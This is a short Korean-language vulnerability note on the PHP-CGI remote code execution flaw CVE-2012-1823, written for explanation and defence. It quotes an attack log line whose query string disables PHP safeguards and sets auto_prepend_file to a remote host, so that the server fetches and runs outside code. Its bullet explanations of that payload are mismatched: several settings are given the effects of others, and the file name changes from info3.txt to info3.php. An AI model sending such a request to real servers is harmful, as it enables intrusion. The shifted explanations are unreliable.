[Apache/PHP 5.x] Remote Code Execution [Not verified yet] (CVE-2012-1823)

 내용

• Apache / PHP 5.x 에서 발생되는 원격 코드 실행 취약점

정보

• CVE-2012-1823: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823

참고자료

• Exploit-DB: http://www.exploit-db.com/exploits/29316/
• 취약점 코드: http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/

취약 버전

• 5.4.2 이전 버전의 5.3.12, 5.4.x PHP에 있는 sapi/cgi/cgi_main.c

CGI 스크립트 (php-cgi)가 설정될 때, 할당 명령이 있는 스트링을 정상적으로 다루지 못해 취약점이 발생됩니다. 이것은 공격자가 옵션 쿼리 스트링을 이용하여 command-line을 넣어 임의의 실행을 가능하도록 합니다. 이 것은 php_getopt의 'd' 옵션의 취약점과 관련되어 있습니다.

아래는 CVE-2012-1823 취약점에 대한 내용입니다.

참고 레퍼런스

• https://isc.sans.edu/diary/PHP+vulnerability+CVE-2012-1823+being+exploited+in+the+wild/13312

CVE-2012-1823을 시도하는 웹 로그는 아래와 같습니다.

bas1-richmondhill34-1177669777.dsl.bell.ca - - [24/May/2012:12:17:49 -0700] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt HTTP/1.1" 404 2890 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"

위 로그의 내용은 아래와 같습니다.

• safe_mode=off: 파일 owner에 의한 실행 확인 설정을 해제. 이 설정은 PHP 5.3.0에서 비추천하며, 5.4.0에서는 삭제되었습니다.
• disable_functions=null: PHP가 http 또는 ftp 위치의 파일을 열 수 있도록 합니다.
• allow_url_fopen=on: process가 실행되기 전에 http 또는 ftp 위치에 추가적인 PHP 코드를 삽입할 수 있습니다.
•  auto_prepend_file=http://81.17.24.82/info3.php: index.php가 실행되기 전에 http://81.17.24.82/info3.php를 실행시킵니다.

윈도우 사용자의 경우 CVE-2012-2376에 영향을 받을 수 있습니다.